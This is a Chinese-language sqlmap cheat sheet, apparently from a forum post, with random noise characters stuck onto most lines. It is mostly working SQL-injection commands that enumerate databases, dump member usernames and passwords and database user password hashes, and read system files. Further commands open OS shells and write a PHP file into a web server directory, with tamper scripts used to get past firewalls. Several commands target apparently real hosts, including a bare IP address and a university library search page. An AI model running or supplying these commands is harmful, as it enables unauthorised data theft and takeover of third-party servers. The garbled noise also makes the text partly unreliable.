/pentest/database/sqlmap
! \7 F+ a. X3 s3 |6 M# J0 N( T& }; L" `) Y w) T8 ]
update :::::> in the folder after execute following order : svn update
6 O. ]: S* f7 B+ p
' q) H/ I1 a1 f3 g/ N7 osqlmap.py -r 1.txt --current-db
+ X; X% B! ^8 v3 Y2 j* m) O+ W* F; [3 e2 e7 J( |/ \, |
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”/ {3 Y/ P* z J U0 ^' ?6 Q O
5 }8 o/ |% `. ]4 Q5 {4 z
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) 6 Q4 ~$ ~% s' _/ a
猜解数据库
/ e0 x: }* i& f2 e. D$ p./sqlmap.py -u "injection-url" --dbs
9 A: p6 |( J- C9 f6 t5 ^! usqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"% S2 w) l6 P! L' N* S E/ Q
* `* h: b5 z/ M5 P1 U8 H猜解表名
3 B* ]. n5 G, v* Y/ N" Q. P4 B./sqlmap.py -u "injection-url" -D database_name --tables
2 k1 N4 n+ O+ b7 W5 D7 w+ G! h* X7 x# Q
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"* b/ [# e5 N% S4 \7 N! p: Q* O, o* J
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
! f/ g; P8 g2 ~* ]! V) ?* N% v4 J( {9 B, E, J) H
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump ~1 o9 I& x4 W: i( G. _5 {
' o5 }, A, ~* u( i3 tsqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
5 H1 j3 ^. n/ E( Rsqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"7 e, Z$ M' q8 a: o" r
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
) v2 f* l4 w: f, I6 r' Csqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"* ]* W" S2 l3 ]6 F F0 T
- _6 _) S' [5 y2 m. b/ l/ w
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py". l4 a! \( ?% e) k6 e( p. d* g/ {
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"; V3 t, R* W8 t" H& N. w9 ]: G) x: d
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"' m! p3 s. n2 Z9 W v* X3 W
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
& D' r! I- R) e0 Rsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
# j% V3 p/ W1 j) a' h, w: C+ p
/ F1 [/ c" ]$ _# T9 [sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了2 H2 a" c$ Y( r z
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
- H' \& q8 G2 H2 y9 ^. U
* a# Q; k+ l9 k! ?, tsqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
# B5 L. ~0 X8 P8 ?) V猜解列名
9 W* g% _& F2 j; Z& h. j1 Z./sqlmap.py -u "injection-url" -D database_name -T table_name --columns0 x' p- _6 x3 f7 X6 t8 h
3 `/ D8 e, Y. V# Zsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" ! K0 _$ P2 [9 g3 B" t" W& t+ d2 b
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
- ? }0 T! T- d* S5 Isqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"7 s2 P4 Z0 u" @3 J: X
7 a. r, U# C: J, I
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
3 ^7 G) ~4 m; D# c* Q- ~) c7 @6 \&submit=Go" N8 k$ G g. t' X6 n
猜解值
8 c/ y( f! H; ~' z S5 f u' ?# t./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump9 l* Q2 L% M" n+ J* Q) K2 q2 j" D; R
========================================================# c2 ~9 O# r& g( a4 r- T
搜索表名中包括mana字符的
) o+ W; Y) \7 Y( c5 Z. f% t/sqlmap.py -u "injection-url" -T mana --search4 n$ B+ l1 U9 y& ^: h+ o- k
返回一个交互式sql shell, |4 j: P2 ]( W+ F
/sqlmap.py -u "injection-url" --sql-shell+ [8 A# ~: g( ]) o O5 Z) }8 G. ?
读取指定文件(需权限)
& F5 r! W; X4 R+ U8 ]: f: k# a- h$ ^/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"( O' `, o% E( C4 E# U# f" x
查看当前 用户 及 数据库 + n0 Q( }8 A' q* _/ e3 W
/sqlmap.py -u "injection-url" --current-user --current-db5 k. Z X( X0 m- v9 C- j6 X
本地文件 写入 远程目标绝对路径8 L' j" X+ y L: n o: |6 b
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
( m: n7 Z; Z( Ssqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" . a- C3 H( D2 ]5 J4 ^
) I+ V3 t% U# F0 ]5 c* i
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
; l% A+ `9 ]( d( j" N8 g查看某用的权限
/ ^5 J' ?# V9 `9 M/ N, c) C# y/sqlmap.py -u "injection-url" --privileges -U root
/ p& j6 Y9 o! R查看当前用户是否为dba
+ S5 `- Y% B% s* T/sqlmap.py -u "injection-url" --is-dba
9 m1 ?2 n& {7 u" y3 \5 a5 r读取所有数据库用户或指定数据库用户的密码5 ]# y, J* t9 x# Q
sqlmap.py -r 1.txt --users --passwords
+ I; W; N/ L: O) s" S/ t4 i3 zsqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
) `6 @1 l) \ ]! p7 p& {3 b0 w' v
/ c3 ~% Z4 J0 c4 S, ?8 Q) S% D/sqlmap.py -u "injection-url" --passwords -U root# j0 F- W! Z7 r; a6 U! u: j
: G) W& O( i7 |0 A
--start&&--stop 与 --first&&--last 的区别( T: ?' G# w5 }& F* y, y" t0 c% }
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)* g5 ~7 x8 F+ q% {, Q
4 `" ~& \. q0 ~& d: }0 n+ V% T% o
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)5 P* }! w, \% n$ d
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
) T) \/ h' C/ l9 `) H' B' y/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
/ `+ P! ~1 U) Z m. g: {& T5 n6 D9 @7 f7 ?; U) \) k: B
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
2 h; E$ f( N( f1 M/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
; w5 l, k% Q2 c. S( u( h* x3 L5 i4 e# n
|